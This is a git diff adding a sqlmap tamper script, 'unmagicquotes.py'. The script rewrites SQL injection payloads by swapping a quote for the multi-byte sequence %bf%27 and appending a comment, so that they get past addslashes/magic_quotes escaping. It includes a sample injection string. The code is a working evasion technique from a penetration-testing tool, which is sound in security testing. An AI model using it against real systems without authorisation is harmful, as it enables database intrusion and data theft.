diff --git a/tamper/unmagicquotes.py b/tamper/unmagicquotes.py new file mode 100644 index 000000000..2e91acb1f --- /dev/null +++ b/tamper/unmagicquotes.py @@ -0,0 +1,56 @@ +#!/usr/bin/env python + +""" +$Id$ + +Copyright (c) 2006-2011 sqlmap developers (http://www.sqlmap.org/) +See the file 'doc/COPYING' for copying permission +""" + +import re +import os +import random + +from lib.core.common import singleTimeWarnMessage +from lib.core.enums import DBMS +from lib.core.enums import PRIORITY + +__priority__ = PRIORITY.NORMAL + +def dependencies(): + pass + +def tamper(payload): + """ + Replaces quote character (') with a multi-byte combo %bf%27 together with generic comment at the end (to make it work) + + Example: + * Input: 1' AND 1=1 + * Output: 1%bf%27 AND 1=1--%20 + + Notes: + * Useful for bypassing magic_quotes/addslashes feature + + Reference: + * http://shiflett.org/blog/2006/jan/addslashes-versus-mysql-real-escape-string + """ + + retVal = payload + + if payload: + found = False + retVal = "" + + for i in xrange(len(payload)): + if payload[i] == '\'' and not found: + retVal += "%bf%27" + found = True + else: + retVal += payload[i] + continue + + if found: + retVal = re.sub("\s*(AND|OR)[\s(]+'[^']+'\s*(=|LIKE)\s*'.*", "", retVal) + retVal += "-- " + + return retVal